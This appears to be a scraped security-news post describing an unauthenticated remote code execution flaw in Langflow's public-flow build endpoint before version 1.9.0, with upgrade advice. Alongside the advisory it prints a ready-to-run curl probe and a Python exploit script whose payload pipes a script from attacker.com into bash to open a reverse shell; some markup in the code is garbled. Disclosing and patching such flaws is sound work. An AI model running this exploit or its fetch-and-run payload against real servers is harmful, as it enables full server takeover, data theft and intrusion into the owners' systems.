Listen to this Post
The vulnerability resides in the POST `/api/v1/build_public_tmp/{flow_id}/flow` endpoint, which is designed to build public flows without authentication. In Langflow versions prior to 1.9.0, the endpoint accepts an optional `data` parameter. When supplied, the application uses the attacker-controlled flow data from this parameter instead of the legitimate flow stored in the database. The flow data contains node definitions where arbitrary Python code can be embedded. The backend passes this code directly to Python’s `exec()` function without any sandboxing or validation. Because the endpoint is intentionally unauthenticated for public flows, an attacker can send a crafted POST request containing malicious Python code in the `data` field. This results in unauthenticated remote code execution (RCE) with the privileges of the Langflow service. The attack bypasses any existing authentication mechanisms because the endpoint does not require a session or API key. The issue is distinct from CVE-2025-3248, which addressed a similar RCE in the `/api/v1/validate/code` endpoint by adding authentication. Here, the design flaw is that the endpoint accepts untrusted input for flow data when it should only use stored, trusted data. The vulnerable code path was introduced before version 1.9.0 and was fully patched in version 1.9.0 by removing the ability to override flow data via the `data` parameter on unauthenticated requests.
Platform: Langflow
Version: < 1.9.0
Vulnerability: Unauthenticated RCE
Severity: Critical
date: 2025-03-20
Prediction: 2025-03-20
What Undercode Say:
Identify vulnerable endpoint
curl -X POST http://target/api/v1/build_public_tmp/{flow_id}/flow \
-H "Content-Type: application/json" \
-d '{"data": {"nodes": [{"data": {"node": {"code": "<strong>import</strong>(\"os\").system(\"id\")"}}}]}}'
Exploit:
import requests
target = "http://target"
flow_id = "public_flow_id"
payload = {
"data": {
"nodes": [{
"data": {
"node": {
"code": "<strong>import</strong>('os').system('curl attacker.com/revshell.sh | bash')"
}
}
}]
}
}
requests.post(f"{target}/api/v1/build_public_tmp/{flow_id}/flow", json=payload)
Protection from this CVE:
- Upgrade to Langflow version 1.9.0 or later.
- If immediate upgrade is impossible, apply network-level restrictions to block access to the `/api/v1/build_public_tmp//flow` endpoint from untrusted sources.
- Review all public-flow endpoints to ensure they do not accept attacker-controlled flow data.
Impact:
- Unauthenticated remote code execution allows attackers to fully compromise the Langflow server.
- Attackers can execute arbitrary system commands, leading to data exfiltration, lateral movement, or complete takeover of the application and underlying infrastructure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

